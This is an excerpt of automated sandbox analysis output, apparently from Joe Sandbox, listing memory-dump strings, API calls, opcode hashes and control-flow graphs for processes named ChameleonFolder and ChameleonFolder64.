                                                                                                            • Instruction Fuzzy Hash: E2A012188085004EC804EF194C4250F72801A40014FC80614785C9D682FA05857442DB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                            • API String ID: 0-1918263038
                                                                                                            • Opcode ID: aacd19e249ff4461f9f6b306c56a27982e634e2551e838a3a856fdfcf76a2efd
                                                                                                            • Instruction ID: debed3010b4e05f5bf95516e4e477d7ea4a7ea060ec2a31c8f9f2422de6ac12a
                                                                                                            • Opcode Fuzzy Hash: aacd19e249ff4461f9f6b306c56a27982e634e2551e838a3a856fdfcf76a2efd
                                                                                                            • Instruction Fuzzy Hash: 2141E56D6093086F5608EEAEB60042777DAD64C6903A4411FE445DE768DB31ACD68A3F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                            • API String ID: 0-3379564615
                                                                                                            • Opcode ID: df3b5a969b8ea66313fe3a97cd0d312523715b9d5381bd6c1648591e7742225a
                                                                                                            • Instruction ID: 7bdb9d6b8516b3fabf60b9df9fc1bba7ca58d806a9b88ae51c468b3deac53c20
                                                                                                            • Opcode Fuzzy Hash: df3b5a969b8ea66313fe3a97cd0d312523715b9d5381bd6c1648591e7742225a
                                                                                                            • Instruction Fuzzy Hash: 067152B4B006495FDB01EF69D880A9E77AADF48740F50807BE904BF346DB39DA06875E
                                                                                                            Strings
                                                                                                            • ERROR GetDialogPath: QueryActiveShellView fail: , xrefs: 034E8455
                                                                                                            • ERROR GetDialogPath: IFolderView not found, xrefs: 034E8490
                                                                                                            • ERROR GetDialogPath: GetCurFolder fail: , xrefs: 034E8532
                                                                                                            • ERROR GetDialogPath: ShellBrowser fail, xrefs: 034E840D
                                                                                                            • ERROR GetDialogPath: GetFolder fail: , xrefs: 034E84E2
                                                                                                            • error, xrefs: 034E83D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERROR GetDialogPath: GetCurFolder fail: $ERROR GetDialogPath: GetFolder fail: $ERROR GetDialogPath: IFolderView not found$ERROR GetDialogPath: QueryActiveShellView fail: $ERROR GetDialogPath: ShellBrowser fail$error
                                                                                                            • API String ID: 0-1686640291
                                                                                                            • Opcode ID: 2b938aaac00dfd9ae4f186fb3659b85684e3e60c2a448d55ee100e9882d2b7a1
                                                                                                            • Instruction ID: 62726e507f7bbfd2e54a2d6aa88f4b289ae4110bc7709083973e9b43c25dbe21
                                                                                                            • Opcode Fuzzy Hash: 2b938aaac00dfd9ae4f186fb3659b85684e3e60c2a448d55ee100e9882d2b7a1
                                                                                                            • Instruction Fuzzy Hash: 53516035A042099FDF45DFA5D9509AEB7F4FF44711F6040AAE810AF251EB349E05CB28
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #32770$ComboBox$ComboBoxEx32$DUIViewWndClassName$Edit$ShellDll_DefView
                                                                                                            • API String ID: 0-2731451753
                                                                                                            • Opcode ID: e11db74aa20667cd10442b81018d9a2fb92825bf31c73f78763c0f14573392bc
                                                                                                            • Instruction ID: b956b9cd5306343fb334d8b453c2eb44ee556cadf1b8364438dd392a942e1162
                                                                                                            • Opcode Fuzzy Hash: e11db74aa20667cd10442b81018d9a2fb92825bf31c73f78763c0f14573392bc
                                                                                                            • Instruction Fuzzy Hash: CC312534F40359AEFF10D7E99C85F9EBFA89F15621F140096BA10AF6C2D6759A00CB6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (basic) procedure $class $constructor $destructor $operator
                                                                                                            • API String ID: 0-1628623062
                                                                                                            • Opcode ID: d01b23878540d82b40bc75317a239584f412023fd0ec341bcf173f61bd6071f1
                                                                                                            • Instruction ID: 7f5cb12c8c0505e90d7af6dc3251f16bd438df6ab6deb7a25c86a9b6cdd5c0ef
                                                                                                            • Opcode Fuzzy Hash: d01b23878540d82b40bc75317a239584f412023fd0ec341bcf173f61bd6071f1
                                                                                                            • Instruction Fuzzy Hash: 2461FB38B002059FEF00DF99C884A9EBBB5FF49210B5440AEE805AF355DB35ED46CB55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: A/P$AAA$AAAA$AM/PM$AMPM
                                                                                                            • API String ID: 0-3831542625
                                                                                                            • Opcode ID: 2cc3ac9a81681c0c44cb284f3f8ab1243b4b5cfd18b64c947bdbfcb0675a998f
                                                                                                            • Instruction ID: d607849937a670de5f43b6d64fe883bea03c29fb7a5e2f234ff41f849d4cc060
                                                                                                            • Opcode Fuzzy Hash: 2cc3ac9a81681c0c44cb284f3f8ab1243b4b5cfd18b64c947bdbfcb0675a998f
                                                                                                            • Instruction Fuzzy Hash: C141A0756042089FDB04DF59C844AAE77AABF44314F14805BE8099F390C7B8DD86CB6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                            • API String ID: 0-2617011621
                                                                                                            • Opcode ID: 1a55750e9e981e95fc03b563de08269f08104781d9776d9c88c1b13bed51e962
                                                                                                            • Instruction ID: d746e21c45b593f01afbfae4248e45d2eb5267954e8748f23472667188c7c2b3
                                                                                                            • Opcode Fuzzy Hash: 1a55750e9e981e95fc03b563de08269f08104781d9776d9c88c1b13bed51e962
                                                                                                            • Instruction Fuzzy Hash: A321E738B043049FD710EA59C8007FABFAAEB89600FE94167BD649F386DA709D01C69D
                                                                                                            Strings
                                                                                                            • ERROR GetPathFromPIDL: GetDisplayName fail: , xrefs: 034E7FB2
                                                                                                            • error, xrefs: 034E7EFC
                                                                                                            • ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: , xrefs: 034E7F59
                                                                                                            • ERROR GetPathFromPIDL: SHGetPathFromIDList fail: , xrefs: 034E8006
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERROR GetPathFromPIDL: GetDisplayName fail: $ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: $ERROR GetPathFromPIDL: SHGetPathFromIDList fail: $error
                                                                                                            • API String ID: 0-4188884885
                                                                                                            • Opcode ID: 36b502b74c6779c99262ba72c149993d54fef038620084c21826426134543280
                                                                                                            • Instruction ID: c5ce7ac62409533bff0a20f5c9c7ca9bd5852c87dc00efd4ede5daeae0a7b8e4
                                                                                                            • Opcode Fuzzy Hash: 36b502b74c6779c99262ba72c149993d54fef038620084c21826426134543280
                                                                                                            • Instruction Fuzzy Hash: 60411C34D013099FCF54EBA5D884AAEBBB8EF49201F1141AAE814AF350DB349F45CF59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: False$Null$True$nil
                                                                                                            • API String ID: 0-1063864068
                                                                                                            • Opcode ID: e56165772af93f89cbf7934f7e9865c6d9a5e4d9975a564c87148c5757b3c8a3
                                                                                                            • Instruction ID: 099046cbf4a0723a9154cfdef929ba969c03ea3509d2d368e9dff763da69c2ba
                                                                                                            • Opcode Fuzzy Hash: e56165772af93f89cbf7934f7e9865c6d9a5e4d9975a564c87148c5757b3c8a3
                                                                                                            • Instruction Fuzzy Hash: FA21AF1531871A579E14E9BB1DB026F42895F4A0947181C7BFD21CFF0AEBD5C847436E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: -$.$>$Owner
                                                                                                            • API String ID: 0-4224991809
                                                                                                            • Opcode ID: b20d6fd611a68b74fd1b1106736291884529317fe1cb842f382a474c06bbd328
                                                                                                            • Instruction ID: cff43d7081d552e97bbeada10faf58326d01a83c683f142bf03567820c816a04
                                                                                                            • Opcode Fuzzy Hash: b20d6fd611a68b74fd1b1106736291884529317fe1cb842f382a474c06bbd328
                                                                                                            • Instruction Fuzzy Hash: 4931A639E242D49FCFA1DB65C84126EF7B9EB05211F1841AFD891AF381E7749EC08B49
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: False$Null$True$nil
                                                                                                            • API String ID: 0-1063864068
                                                                                                            • Opcode ID: 488fc695bc43fc7ffee229180347fe1e6c1287467368c278b320ccddf4f2a19c
                                                                                                            • Instruction ID: 0315ef8205fcd1b082cfe07893fa07fd7c5fa74f6f0f5d887ade6791806d9fb7
                                                                                                            • Opcode Fuzzy Hash: 488fc695bc43fc7ffee229180347fe1e6c1287467368c278b320ccddf4f2a19c
                                                                                                            • Instruction Fuzzy Hash: 1621073C720388AFCB41EBA59C9065D76AADB49600F1040BBF805DF346D678EE0A875E

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:55.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:23
                                                                                                            Total number of Limit Nodes:3
                                                                                                            execution_graph 1499 2268090 1500 226811b 1499->1500 1501 22680a6 1499->1501 1501->1500 1503 2268030 CreateThread SetThreadPriority ResumeThread 1501->1503 1503->1500 1504 2267fa0 1503->1504 1505 2267fb8 SetWindowsHookExW 1504->1505 1506 2267fe4 1504->1506 1505->1506 1521 2267f90 1522 2267fa0 1521->1522 1523 2267fb8 SetWindowsHookExW 1522->1523 1524 2267fe4 1522->1524 1523->1524 1507 21ae300 1508 21ae321 1507->1508 1510 21ae3b5 1507->1510 1509 21ae3a9 GetNativeSystemInfo 1508->1509 1508->1510 1509->1510 1511 226e9c8 1513 22737e8 1511->1513 1512 2273b62 1513->1512 1515 22682b0 1513->1515 1516 22682ca 1515->1516 1520 2268313 1515->1520 1517 22682d2 CreateFileMappingW 1516->1517 1516->1520 1518 2268326 MapViewOfFile 1517->1518 1517->1520 1518->1520 1520->1512
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.000000000226C000.00000020.00000001.01000000.00000011.sdmp, Offset: 0226C000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_226c000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f87f73ee555d19d349671ab8061e292d9ec59dfe8dd1c2d20883c447361bf585
                                                                                                            • Instruction ID: 0fae1880affc0ed1d5b0b3aa7df7c3444f711a93ffbd790a8a413860f5bd509d
                                                                                                            • Opcode Fuzzy Hash: f87f73ee555d19d349671ab8061e292d9ec59dfe8dd1c2d20883c447361bf585
                                                                                                            • Instruction Fuzzy Hash: 39E3319046EBF24FCB1347B889AA1E17FB5DD0760470999C7C0D1CF4B7D918A91BA32A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 248 22682b0-22682c4 249 22682ca-22682cc 248->249 250 226839b-22683a6 248->250 251 22682d2-2268311 CreateFileMappingW 249->251 252 22683d8-22683dd 249->252 253 22683b7-22683c2 250->253 254 22683a8-22683b0 250->254 257 2268326-2268369 MapViewOfFile 251->257 258 2268313-2268321 251->258 255 22683c4-22683cc 253->255 256 22683d3 253->256 254->253 255->256 256->252 260 2268394 257->260 261 226836b-226838d 257->261 258->252 263 2268399 260->263 261->260 263->252
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE ref: 022682F7
                                                                                                            • MapViewOfFile.KERNELBASE ref: 02268356
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3452162329-2852464175
                                                                                                            • Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction ID: 129d0fb4357e86969b62e01ab3ec5949b0e74cf0dd403c24a386118b5dba1187
                                                                                                            • Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction Fuzzy Hash: CE317E71128A4D8FEB94EF6CE88877533E1FB49304F4086A5E01AC72B4DB78D884CB02

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 264 2268030-2268086 CreateThread SetThreadPriority ResumeThread
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreatePriorityResume
                                                                                                            • String ID:
                                                                                                            • API String ID: 2021017085-0
                                                                                                            • Opcode ID: 2fc43ddb754d5fd58a377cf2c23cb7cb11baaf4f50db15b93fcb8d7733540021
                                                                                                            • Instruction ID: 7aeeb0365904e094b4c4adb11d48f1c753c0f33ea4bb205a7b8f39998d2ceb3e
                                                                                                            • Opcode Fuzzy Hash: 2fc43ddb754d5fd58a377cf2c23cb7cb11baaf4f50db15b93fcb8d7733540021
                                                                                                            • Instruction Fuzzy Hash: 61E0ED306549484FEF14EF34DC45656BBE6F799314F5142AA841AC22A0DF788246CB46

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 265 21ae300-21ae31b 266 21ae67a-21ae684 265->266 267 21ae321-21ae3a7 call 21ae6b0 265->267 273 21ae3a9-21ae3b0 GetNativeSystemInfo 267->273 274 21ae3b5-21ae3dd 267->274 273->274 275 21ae3df-21ae3e6 274->275 276 21ae3f1-21ae40d 274->276 277 21ae3e8-21ae3ef 275->277 278 21ae45e-21ae47c 275->278 279 21ae415-21ae417 276->279 277->276 277->278 283 21ae5d2-21ae5de 278->283 284 21ae482-21ae487 278->284 280 21ae419-21ae429 279->280 281 21ae431-21ae458 279->281 280->281 281->278 285 21ae5e0-21ae5e2 283->285 286 21ae5f1-21ae604 283->286 287 21ae489-21ae48e 284->287 288 21ae4be-21ae4ca 284->288 291 21ae606-21ae619 285->291 292 21ae5e4-21ae5e9 285->292 286->266 287->266 293 21ae494-21ae4a0 287->293 289 21ae4eb-21ae4f2 288->289 290 21ae4cc-21ae4ce 288->290 296 21ae50c-21ae51f 289->296 297 21ae4f4-21ae507 289->297 294 21ae4d0-21ae4d5 290->294 295 21ae524-21ae52b 290->295 291->266 292->266 298 21ae5ef-21ae622 292->298 293->266 300 21ae4a6-21ae4b9 293->300 301 21ae4db-21ae4e0 294->301 302 21ae55d-21ae564 294->302 305 21ae52d-21ae540 295->305 306 21ae545-21ae558 295->306 296->266 297->266 313 21ae643-21ae650 298->313 314 21ae624-21ae62c 298->314 300->266 301->266 308 21ae4e6-21ae5a0 call 21ae2a0 301->308 309 21ae57e-21ae591 302->309 310 21ae566-21ae579 302->310 305->266 306->266 327 21ae5ba-21ae5cd 308->327 328 21ae5a2-21ae5b5 308->328 309->266 310->266 324 21ae652-21ae665 313->324 325 21ae667-21ae66f 313->325 314->313 315 21ae62e-21ae641 314->315 315->266 324->266 325->266 327->266 328->266
                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNELBASE ref: 021AE3B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.00000000021AE000.00000020.00000001.01000000.00000011.sdmp, Offset: 021AE000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_21ae000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction ID: 176f182c50e772896ce10e60a6330080bb80e55bd819838d5cfd5b7deb33ae4f
                                                                                                            • Opcode Fuzzy Hash: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction Fuzzy Hash: 34919E3519550ACEEB64EF28ED607E637A2FB18344F508237DC1BC21A1EB389585CFA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 332 2267f90-2267fb6 334 2267ff6-226800a 332->334 335 2267fb8-2267fe2 SetWindowsHookExW 332->335 337 2268015-2268024 334->337 338 226800c-2268013 334->338 335->334 338->337 339 2267fe4-2267fee 338->339 339->334
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 4a13e9e2dc0b3fd7673bf0f609cff19fbedb4852650dfecb80521084deb408a9
                                                                                                            • Instruction ID: 5e5247147f38648d489757b4ee488dd756d8cce741c98e9c72d9e3ac67a57b1b
                                                                                                            • Opcode Fuzzy Hash: 4a13e9e2dc0b3fd7673bf0f609cff19fbedb4852650dfecb80521084deb408a9
                                                                                                            • Instruction Fuzzy Hash: 21016231524A4C8FEF64EF68D844BB673A1E714304F01436AA81AC6694DF34D486CB41

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 341 2267fa0-2267fb6 342 2267ff6-226800a 341->342 343 2267fb8-2267fe2 SetWindowsHookExW 341->343 345 2268015-2268024 342->345 346 226800c-2268013 342->346 343->342 346->345 347 2267fe4-2267fee 346->347 347->342
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 46d193b6c8daed4bf02707ba233f577279aa029b77350af6a806d5010acb989d
                                                                                                            • Instruction ID: e27755c8bbc35eb41703410adfc13b66563ea5adef4cbcb8e29a02cec4b2d440
                                                                                                            • Opcode Fuzzy Hash: 46d193b6c8daed4bf02707ba233f577279aa029b77350af6a806d5010acb989d
                                                                                                            • Instruction Fuzzy Hash: 3901713112490C8FDF28EF64D844BBA77A1FB14318F0143AAA81AC6290DF34D486CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 349 2184e25-2184e28 350 2184e2a-2184e3a 349->350 351 2184e44-2184e53 349->351 355 2184e6d-2184e7c 350->355 358 2184e3c-2184e3f 350->358 352 2184e59-2184e68 351->352 353 2184eec-2184eee 351->353 352->355 356 2184ef0 call 2184850 353->356 357 2184ef5-2184eff 353->357 355->353 356->357 360 2184f94-2184fa0 357->360 361 2184f05-2184f48 357->361 358->351 364 2184fcc-2184fd2 call 2184a10 360->364 365 2184fa2-2184fb6 360->365 362 2184f4a-2184f55 361->362 363 2184f5e-2184f5f 361->363 362->363 366 2184f57 362->366 363->360 370 2184fd7-2184fdd 364->370 367 2184fb8 365->367 368 2184fba-2184fca 365->368 366->363 367->368 371 2184ff1 368->371 370->371 372 2184fdf-2184fe7 370->372 372->371
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002181000.00000020.00000001.01000000.00000011.sdmp, Offset: 02181000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2181000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction ID: ff11d8008629855868188b89dd24b6a72c9defc50ad1bf0e04ff76ced67a04f3
                                                                                                            • Opcode Fuzzy Hash: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction Fuzzy Hash: A1412472548A5A8FCB28EF1CC4D4320B7E1FB65304B2A828EC859CF656DB74D881CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 373 2184a10-2184a33 call 2184970 call 2184680 377 2184a38-2184a3e 373->377 378 2184a40-2184a95 377->378 379 2184a97-2184aa2 377->379 380 2184aa4-2184aa9 378->380 379->380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002181000.00000020.00000001.01000000.00000011.sdmp, Offset: 02181000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2181000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction ID: f1bb65a8d009d2525adac39144f24a83bbe5bd279837b28def949d40fa435416
                                                                                                            • Opcode Fuzzy Hash: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction Fuzzy Hash: 82014FB1601E0A8FD758EF6895CC3263AD6F729305F20417EA54DCB679DBB184868F84

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 402 2199b40-2199b52 403 2199b6c-2199b70 402->403 404 2199b54-2199b55 402->404 405 2199b60-2199b61 404->405 405->403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002199000.00000020.00000001.01000000.00000011.sdmp, Offset: 02199000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2199000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction ID: 196e66398a9c6a7d2d31eaacdd5a0cb569df825e3d032fda1c8f49cd6f8b8182
                                                                                                            • Opcode Fuzzy Hash: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction Fuzzy Hash: B6D0C7314985094ACB29FB31DC949953265F7443387900355C563D14F0EB2D1558DE81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 406 21a0a40-21a0a48 407 21a0a4a-21a0a4b 406->407 408 21a0a4e-21a0a54 406->408 407->408 409 21a0a5a-21a0a63 408->409 410 21a0a56-21a0a57 408->410 411 21a0b28-21a0b2a 409->411 412 21a0a69-21a0a6c 409->412 410->409 412->411 413 21a0a72-21a0a74 412->413 414 21a0a7e-21a0a7f 413->414 415 21a0a76-21a0a7c 413->415 416 21a0a81-21a0a87 414->416 415->416 417 21a0a8d-21a0a9e 416->417 418 21a0b27 416->418 419 21a0b1a-21a0b21 417->419 420 21a0aa0-21a0ab4 417->420 418->411 419->417 419->418 421 21a0ada-21a0af4 420->421 422 21a0ab6-21a0ab9 420->422 421->419 425 21a0af6-21a0af9 421->425 423 21a0abb-21a0abe 422->423 424 21a0ac3-21a0ac6 422->424 423->424 426 21a0ac0 423->426 427 21a0ac8-21a0acb 424->427 428 21a0ad0-21a0ad2 424->428 429 21a0afb-21a0afe 425->429 430 21a0b03-21a0b06 425->430 426->424 427->428 433 21a0acd 427->433 428->421 434 21a0ad4-21a0ad8 428->434 429->430 435 21a0b00 429->435 431 21a0b08-21a0b0b 430->431 432 21a0b10-21a0b12 430->432 431->432 436 21a0b0d 431->436 432->419 437 21a0b14-21a0b18 432->437 433->428 434->411 435->430 436->432 437->411
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002199000.00000020.00000001.01000000.00000011.sdmp, Offset: 02199000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2199000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: a$a$z$z
                                                                                                            • API String ID: 0-3217829273
                                                                                                            • Opcode ID: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction ID: 842c929a1baf723d1aefcaf6c6cbb7d825c1de5eff6fcee178048658c0dd0b47
                                                                                                            • Opcode Fuzzy Hash: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction Fuzzy Hash: 5421D42EBE7A2E461B3C18BC5EF837DA181E61D74D73A633AC893D2245E78198834185

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:44.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:16
                                                                                                            Total number of Limit Nodes:0
